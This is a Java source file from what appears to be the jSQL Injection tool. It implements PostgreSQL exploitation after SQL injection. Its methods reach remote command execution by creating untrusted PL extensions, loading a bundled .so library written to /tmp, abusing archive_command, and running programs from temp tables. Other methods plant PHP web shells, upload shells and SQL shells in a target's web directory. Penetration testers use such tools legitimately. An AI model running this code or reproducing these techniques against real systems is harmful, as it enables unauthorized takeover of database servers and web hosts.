1 package com.jsql.model.accessible.vendor;
2
3 import com.jsql.model.InjectionModel;
4 import com.jsql.model.accessible.DataAccess;
5 import com.jsql.model.accessible.ResourceAccess;
6 import com.jsql.model.accessible.vendor.postgres.ModelYamlPostgres;
7 import com.jsql.model.bean.util.Interaction;
8 import com.jsql.model.bean.util.Request;
9 import com.jsql.model.exception.JSqlException;
10 import com.jsql.model.exception.JSqlRuntimeException;
11 import com.jsql.model.injection.vendor.model.VendorYaml;
12 import com.jsql.util.LogLevelUtil;
13 import com.jsql.util.StringUtil;
14 import org.apache.commons.lang3.RandomStringUtils;
15 import org.apache.commons.lang3.StringUtils;
16 import org.apache.logging.log4j.LogManager;
17 import org.apache.logging.log4j.Logger;
18 import org.yaml.snakeyaml.Yaml;
19
20 import java.io.File;
21 import java.io.FileInputStream;
22 import java.io.IOException;
23 import java.io.InputStream;
24 import java.net.http.HttpResponse;
25 import java.util.Arrays;
26 import java.util.List;
27 import java.util.Objects;
28 import java.util.UUID;
29 import java.util.function.BinaryOperator;
30
31 public class ExploitPostgres {
32
33
34
35
36 private static final Logger LOGGER = LogManager.getRootLogger();
37 private final InjectionModel injectionModel;
38 private String nameExtension = StringUtils.EMPTY;
39 private final ModelYamlPostgres modelYaml;
40
41 public ExploitPostgres(InjectionModel injectionModel) {
42 this.injectionModel = injectionModel;
43 var yaml = new Yaml();
44 this.modelYaml = yaml.loadAs(
45 injectionModel.getMediatorVendor().getPostgres().instance().getModelYaml().getResource().getExploit(),
46 ModelYamlPostgres.class
47 );
48 }
49
50 public void createUdf(String nameExtension) throws JSqlException {
51 LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "Exploit mode forced to query body");
52
53 if (StringUtils.isNotEmpty(nameExtension)) {
54 this.nameExtension = this.createExtension(nameExtension);
55 } else if (!this.isRceDetected()) {
56 return;
57 }
58
59 this.injectionModel.injectWithoutIndex(this.modelYaml.getUdf().getDropFunc(), ResourceAccess.DROP_FUNC);
60
61 String plCreateBasicExtension = this.getCreateBasicExtension();
62 if (plCreateBasicExtension != null) {
63 this.injectionModel.injectWithoutIndex(plCreateBasicExtension, ResourceAccess.ADD_FUNC);
64 } else if (this.nameExtension.startsWith("sql")) {
65 this.injectionModel.injectWithoutIndex(this.modelYaml.getUdf().getSql().getDropTable(), ResourceAccess.TBL_DROP);
66 this.injectionModel.injectWithoutIndex(this.modelYaml.getUdf().getSql().getCreateTable(), ResourceAccess.TBL_CREATE);
67 this.injectionModel.injectWithoutIndex(this.modelYaml.getUdf().getSql().getConfirm().getAddFunc(), ResourceAccess.ADD_FUNC);
68 this.injectionModel.injectWithoutIndex(this.modelYaml.getUdf().getSql().getRunCmd(), ResourceAccess.RUN_FUNC);
69 var result = this.injectionModel.getResourceAccess().getResult(
70 String.format(this.modelYaml.getUdf().getSql().getResultCmd(), StringUtils.EMPTY),
71 ResourceAccess.BODY_CONFIRM
72 );
73 if (!"1337".equals(result)) {
74 return;
75 }
76 }
77
78 var functions = this.injectionModel.getResourceAccess().getResult(
79 this.modelYaml.getUdf().getSql().getConfirm().getFuncExists(),
80 ResourceAccess.BODY_CONFIRM
81 );
82 if (!functions.contains("exec_cmd")) {
83 LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "RCE failure: function not found");
84 return;
85 }
86
87 LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "RCE [Extension] successful: function found for extension [{}]", this.nameExtension);
88 var request = new Request();
89 request.setMessage(Interaction.ADD_TAB_EXPLOIT_RCE_EXTENSION_POSTGRES);
90 request.setParameters(null, null);
91 this.injectionModel.sendToViews(request);
92 }
93
94 private String getCreateBasicExtension() {
95 String plCreateExtension = null;
96 if (this.nameExtension.startsWith("plpython")) {
97 plCreateExtension = String.format(this.modelYaml.getUdf().getPlpython(), this.nameExtension);
98 } else if (this.nameExtension.startsWith("plperl")) {
99 plCreateExtension = this.modelYaml.getUdf().getPlperl();
100 } else if (this.nameExtension.startsWith("pltcl")) {
101 plCreateExtension = this.modelYaml.getUdf().getPltcl();
102 } else if (this.nameExtension.startsWith("plr")) {
103 plCreateExtension = this.modelYaml.getUdf().getPlr();
104 } else if (this.nameExtension.startsWith("pllua")) {
105 plCreateExtension = this.modelYaml.getUdf().getPllua();
106 } else if (this.nameExtension.startsWith("plsh")) {
107 plCreateExtension = this.modelYaml.getUdf().getPlsh();
108 }
109 return plCreateExtension;
110 }
111
112 private boolean isRceDetected() throws JSqlException {
113
114 return this.checkRceProgram() || this.checkRceExtension() || this.checkRceLibrary() || this.checkRceArchive();
115 }
116
117 private boolean checkRceProgram() {
118 LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "RCE [Program] requirements: stack query");
119 var nameTempTable = RandomStringUtils.secure().nextAlphabetic(8);
120 this.injectionModel.injectWithoutIndex(String.format(
121 this.modelYaml.getFile().getWrite().getTempTable().getAdd(),
122 nameTempTable
123 ), ResourceAccess.TBL_CREATE);
124 this.injectionModel.injectWithoutIndex(String.format(
125 this.modelYaml.getUdf().getProgram().getRun(),
126 nameTempTable,
127 ResourceAccess.WEB_CONFIRM_CMD
128 ), ResourceAccess.TBL_FILL);
129 var result = this.injectionModel.getResourceAccess().getResultWithCatch(String.format(
130 this.modelYaml.getUdf().getProgram().getGetResult(),
131 nameTempTable
132 ), ResourceAccess.TBL_READ);
133 if (result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) {
134 LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "RCE [Program] successful: command execution found");
135 var request = new Request();
136 request.setMessage(Interaction.ADD_TAB_EXPLOIT_RCE_PROGRAM_POSTGRES);
137 request.setParameters(null, null);
138 this.injectionModel.sendToViews(request);
139 return true;
140 }
141 return false;
142 }
143
144 private boolean checkRceExtension() throws JSqlException {
145 this.nameExtension = StringUtils.EMPTY;
146 LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "RCE [Extension] requirements: stack query, any of py/sh/pl/lua/sql/r/tcl installed");
147 for (var ext: Arrays.asList("plpython3u", "plpython2u", "plpythonu", "plperlu", "pltclu", "pllua", "plsh", "sql", "plr")) {
148 if (StringUtils.isEmpty(this.nameExtension)) {
149 this.nameExtension = this.createExtension(ext);
150 }
151 }
152 if (StringUtils.isEmpty(this.nameExtension)) {
153 LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "RCE [Extension] failure: no extension found");
154 return true;
155 }
156 return false;
157 }
158
159 public boolean checkRceLibrary() throws JSqlException {
160 LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "RCE [Library] requirements: stack query");
161 this.injectionModel.injectWithoutIndex(String.format(this.modelYaml.getUdf().getLibrary().getDropFunc()), ResourceAccess.DROP_FUNC);
162 var loid = this.injectionModel.getResourceAccess().getResultWithCatch(String.format(
163 this.modelYaml.getUdf().getLibrary().getLoFromText(),
164 String.join(StringUtils.EMPTY, ExploitPostgres.toHexChunks("v10.64"))
165 ), ResourceAccess.ADD_LOID);
166 if (StringUtils.isEmpty(loid)) {
167 LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.LOID_NOT_FOUND);
168 return false;
169 }
170 var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".so";
171 this.injectionModel.getResourceAccess().getResultWithCatch(String.format(
172 this.modelYaml.getUdf().getLibrary().getLoToFile(),
173 loid,
174 "/tmp/" + nameExploit
175 ), ResourceAccess.WRITE_LOID);
176 this.injectionModel.injectWithoutIndex(String.format(
177 this.modelYaml.getUdf().getLibrary().getCreateFunction(),
178 "/tmp/" + nameExploit
179 ), ResourceAccess.ADD_FUNC);
180 String result = this.injectionModel.getResourceAccess().getResultWithCatch(String.format(
181 this.modelYaml.getUdf().getLibrary().getRunFunc(),
182 ResourceAccess.WEB_CONFIRM_CMD + "%20"
183 ), "confirm");
184 if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) {
185 LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found");
186 return false;
187 }
188 LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "RCE [Library] successful");
189 var request = new Request();
190 request.setMessage(Interaction.ADD_TAB_EXPLOIT_RCE_LIBRARY_POSTGRES);
191 request.setParameters(null, null);
192 this.injectionModel.sendToViews(request);
193 return true;
194 }
195
196 private boolean checkRceArchive() throws JSqlException {
197 LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "RCE [Archive] requirements: archive_mode enabled");
198 if (!StringUtils.EMPTY.equals(this.runArchive(null))) {
199 LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "RCE [Archive] successful: command execution found");
200 var request = new Request();
201 request.setMessage(Interaction.ADD_TAB_EXPLOIT_RCE_WAL_POSTGRES);
202 request.setParameters(null, null);
203 this.injectionModel.sendToViews(request);
204 return true;
205 }
206 return false;
207 }
208
209 private static List<String> toHexChunks(String filename) throws JSqlException {
210 try {
211 byte[] fileData = Objects.requireNonNull(
212 ExploitMysql.class.getClassLoader().getResourceAsStream("exploit/postgres/"+ filename +".so")
213 ).readAllBytes();
214 return StringUtil.toHexChunks(fileData);
215 } catch (IOException e) {
216 throw new JSqlException(e);
217 }
218 }
219
220 public String runRceLibraryCmd(String command, UUID uuidShell) {
221 String result;
222 try {
223 result = this.injectionModel.getResourceAccess().getResult(String.format(
224 this.modelYaml.getUdf().getLibrary().getRunFunc(),
225 command.replace(StringUtils.SPACE, "%20") + "%20"
226 ), ResourceAccess.RUN_FUNC);
227 } catch (JSqlException e) {
228 result = String.format(ResourceAccess.TEMPLATE_ERROR, e.getMessage(), command);
229 }
230 var request = new Request();
231 request.setMessage(Interaction.GET_TERMINAL_RESULT);
232 request.setParameters(uuidShell, result.trim() +"\n");
233 this.injectionModel.sendToViews(request);
234 return result;
235 }
236
237 private String runArchive(String command) throws JSqlException {
238 boolean isSetup = command == null;
239
240 String status = this.injectionModel.getResourceAccess().getResult(this.modelYaml.getUdf().getArchive().getGetStatus(), "wal#status");
241 if (isSetup && !status.contains("on")) {
242 LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit [Archive] failure: archive_mode disabled");
243 return StringUtils.EMPTY;
244 }
245
246 String pathConf = this.injectionModel.getResourceAccess().getResult(this.modelYaml.getUdf().getArchive().getGetPathConf(), "conf#path");
247 String loidConf = this.injectionModel.getResourceAccess().getResult(String.format(
248 this.modelYaml.getUdf().getArchive().getGetConfLoid(),
249 pathConf
250 ), "conf#loid");
251 String lengthConf = this.injectionModel.getResourceAccess().getResult(String.format(
252 this.modelYaml.getUdf().getArchive().getGetConfLength(),
253 loidConf
254 ), "conf#size");
255
256 this.injectionModel.getResourceAccess().getResultWithCatch(String.format(
257 this.modelYaml.getUdf().getArchive().getPutCmd(),
258 loidConf,
259 lengthConf,
260 isSetup ? ResourceAccess.WEB_CONFIRM_CMD +"%20" : command
261 ), "conf#append");
262
263 this.injectionModel.getResourceAccess().getResultWithCatch(String.format(
264 this.modelYaml.getFile().getWrite().getLargeObject().getToFile(),
265 loidConf,
266 pathConf
267 ), "conf#write");
268 this.injectionModel.getResourceAccess().getResultWithCatch(this.modelYaml.getUdf().getArchive().getReloadConf(), "wal#reload");
269
270 String cmdArchive = this.injectionModel.getResourceAccess().getResult(this.modelYaml.getUdf().getArchive().getGetCmd(), "cmd#confirm");
271 if (isSetup && !cmdArchive.contains("/tmp/cmd.txt")) {
272 LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit [Archive] failure: archive command missing");
273 return StringUtils.EMPTY;
274 }
275
276 this.injectionModel.getResourceAccess().getResultWithCatch(this.modelYaml.getUdf().getArchive().getRunWal(), "wal#run");
277 try {
278 Thread.sleep(750);
279 } catch (InterruptedException e) {
280 LOGGER.log(LogLevelUtil.IGNORE, e, e);
281 Thread.currentThread().interrupt();
282 }
283 String loidResult = this.injectionModel.getResourceAccess().getResultWithCatch(this.modelYaml.getUdf().getArchive().getGetResult(), "result#loid");
284 String result = this.injectionModel.getResourceAccess().getResult(String.format(
285 this.modelYaml.getFile().getRead().getLargeObject().getToText(),
286 loidResult
287 ), "result#read");
288
289 if (isSetup && !result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) {
290 LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit [Archive] failure: command result missing");
291 return StringUtils.EMPTY;
292 }
293 return result;
294 }
295
296 private String createExtension(String nameExtension) throws JSqlException {
297 LOGGER.log(LogLevelUtil.CONSOLE_INFORM, "Checking extension {}", nameExtension);
298 this.injectionModel.injectWithoutIndex(String.format(
299 this.modelYaml.getUdf().getExtension().getCreate(),
300 nameExtension
301 ), "body#add-ext");
302 String languages = this.injectionModel.getResourceAccess().getResult(
303 this.modelYaml.getUdf().getExtension().getLanguages(),
304 "body#confirm-ext"
305 );
306 if (languages.contains(nameExtension)) {
307 return nameExtension;
308 }
309 return StringUtils.EMPTY;
310 }
311
312 public String runRceArchiveCmd(String command, UUID uuidShell) {
313 String result;
314 try {
315 result = this.runArchive(command.replace(StringUtils.SPACE, "%20") +"%20");
316 } catch (JSqlException e) {
317 result = String.format(ResourceAccess.TEMPLATE_ERROR, e.getMessage(), command);
318 }
319 var request = new Request();
320 request.setMessage(Interaction.GET_TERMINAL_RESULT);
321 request.setParameters(uuidShell, result.trim() +"\n");
322 this.injectionModel.sendToViews(request);
323 return result;
324 }
325
326 public String runRceProgramCmd(String command, UUID uuidShell) {
327 String result;
328 try {
329 var nameTempTable = RandomStringUtils.secure().nextAlphabetic(8);
330 this.injectionModel.injectWithoutIndex(String.format(
331 this.modelYaml.getFile().getWrite().getTempTable().getAdd(),
332 nameTempTable
333 ), ResourceAccess.TBL_CREATE);
334 this.injectionModel.injectWithoutIndex(String.format(
335 this.modelYaml.getUdf().getProgram().getRun(),
336 nameTempTable,
337 command.replace(StringUtils.SPACE, "%20") +"%20"
338 ), ResourceAccess.TBL_FILL);
339 result = this.injectionModel.getResourceAccess().getResult(String.format(
340 this.modelYaml.getUdf().getProgram().getGetResult(),
341 nameTempTable
342 ), ResourceAccess.TBL_READ);
343 } catch (JSqlException e) {
344 result = String.format(ResourceAccess.TEMPLATE_ERROR, e.getMessage(), command);
345 }
346 var request = new Request();
347 request.setMessage(Interaction.GET_TERMINAL_RESULT);
348 request.setParameters(uuidShell, result.trim() +"\n");
349 this.injectionModel.sendToViews(request);
350 return result;
351 }
352
353 public String runRceExtensionCmd(String command, UUID uuidShell) {
354 String result;
355 try {
356 if ("sql".equals(this.nameExtension)) {
357 this.injectionModel.injectWithoutIndex(this.modelYaml.getUdf().getSql().getClean(), "body#empty-tbl");
358 this.injectionModel.injectWithoutIndex(String.format(
359 this.modelYaml.getUdf().getSql().getRunFunc(),
360 command.replace(StringUtils.SPACE, "%20")
361 ), ResourceAccess.ADD_FUNC);
362 this.injectionModel.injectWithoutIndex(this.modelYaml.getUdf().getSql().getRunCmd(), ResourceAccess.UDF_RUN_CMD);
363 result = this.injectionModel.getResourceAccess().getResult(String.format(
364 this.modelYaml.getUdf().getSql().getResultCmd(),
365 VendorYaml.TRAIL_SQL
366 ), "body#result") +"\n";
367 } else {
368 result = this.injectionModel.getResourceAccess().getResult(
369 String.format(
370 this.modelYaml.getUdf().getRunFunc(),
371 command.replace(StringUtils.SPACE, "%20"),
372 VendorYaml.TRAIL_SQL
373 ),
374 ResourceAccess.UDF_RUN_CMD
375 );
376 }
377 } catch (JSqlException e) {
378 result = String.format(ResourceAccess.TEMPLATE_ERROR, e.getMessage(), command);
379 }
380 var request = new Request();
381 request.setMessage(Interaction.GET_TERMINAL_RESULT);
382 request.setParameters(uuidShell, result.trim() +"\n");
383 this.injectionModel.sendToViews(request);
384 return result;
385 }
386
387 public void createWeb(String pathExploit, String urlExploit) {
388 String bodyExploit = StringUtil.base64Decode(
389 this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB)
390 )
391 .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
392 .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
393
394 var loid = this.injectionModel.getResourceAccess().getResultWithCatch(String.format(
395 this.modelYaml.getFile().getWrite().getLargeObject().getFromText(),
396 bodyExploit.replace("'", "\"")
397 ), ResourceAccess.ADD_LOID);
398 if (StringUtils.isEmpty(loid)) {
399 LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.LOID_NOT_FOUND);
400 return;
401 }
402 var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
403 this.injectionModel.getResourceAccess().getResultWithCatch(String.format(
404 this.modelYaml.getFile().getWrite().getLargeObject().getToFile(),
405 loid,
406 pathExploit + nameExploit
407 ), ResourceAccess.WRITE_LOID);
408
409 BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
410 String result = this.injectionModel.getResourceAccess().callCommand(
411 urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD
412 );
413 if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) {
414 LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found");
415 return StringUtils.EMPTY;
416 }
417 var request = new Request();
418 request.setMessage(Interaction.ADD_TAB_EXPLOIT_WEB);
419 request.setParameters(urlSuccess);
420 this.injectionModel.sendToViews(request);
421 return urlSuccess;
422 };
423
424 this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
425 }
426
427 public String createSql(String pathExploit, String urlExploit, String username, String password) {
428 BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
429 var resultQuery = this.injectionModel.getResourceAccess().runSqlShell(
430 ResourceAccess.SQL_CONFIRM_CMD,
431 null,
432 urlSuccess,
433 username,
434 password,
435 false
436 );
437 if (resultQuery != null && resultQuery.contains(ResourceAccess.SQL_CONFIRM_RESULT)) {
438 var request = new Request();
439 request.setMessage(Interaction.ADD_TAB_EXPLOIT_SQL);
440 request.setParameters(urlSuccess, username, password);
441 this.injectionModel.sendToViews(request);
442 return urlSuccess;
443 }
444 return StringUtils.EMPTY;
445 };
446
447 String bodyExploit = StringUtil.base64Decode(
448 this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty("exploit.sql.pdo.pgsql")
449 )
450 .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
451 .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
452
453 var loid = this.injectionModel.getResourceAccess().getResultWithCatch(String.format(
454 this.modelYaml.getFile().getWrite().getLargeObject().getFromText(),
455 bodyExploit.replace("'", "\"")
456 ), ResourceAccess.ADD_LOID);
457 if (StringUtils.isEmpty(loid)) {
458 LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.LOID_NOT_FOUND);
459 return StringUtils.EMPTY;
460 }
461 var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
462 this.injectionModel.getResourceAccess().getResultWithCatch(String.format(
463 this.modelYaml.getFile().getWrite().getLargeObject().getToFile(),
464 loid,
465 pathExploit + nameExploit
466 ), ResourceAccess.WRITE_LOID);
467
468 return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
469 }
470
471 public void createUpload(String pathExploit, String urlExploit, File fileToUpload) {
472 String bodyExploit = StringUtil.base64Decode(
473 this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_UPL)
474 )
475 .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
476 .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
477
478 var loid = this.injectionModel.getResourceAccess().getResultWithCatch(String.format(
479 this.modelYaml.getFile().getWrite().getLargeObject().getFromText(),
480 bodyExploit.replace("'", "\"")
481 ), ResourceAccess.ADD_LOID);
482 if (StringUtils.isEmpty(loid)) {
483 LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.LOID_NOT_FOUND);
484 return;
485 }
486 var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
487 this.injectionModel.getResourceAccess().getResultWithCatch(String.format(
488 this.modelYaml.getFile().getWrite().getLargeObject().getToFile(),
489 loid,
490 pathExploit + nameExploit
491 ), ResourceAccess.WRITE_LOID);
492
493 BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
494 try (InputStream streamToUpload = new FileInputStream(fileToUpload)) {
495 HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload);
496 if (result.body().contains(DataAccess.LEAD +"y")) {
497 LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName());
498 } else {
499 LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName());
500 }
501 } catch (InterruptedException e) {
502 LOGGER.log(LogLevelUtil.IGNORE, e, e);
503 Thread.currentThread().interrupt();
504 } catch (IOException | JSqlException e) {
505 throw new JSqlRuntimeException(e);
506 }
507 return urlSuccess;
508 };
509
510 this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
511 }
512
513 public ModelYamlPostgres getModelYaml() {
514 return this.modelYaml;
515 }
516 }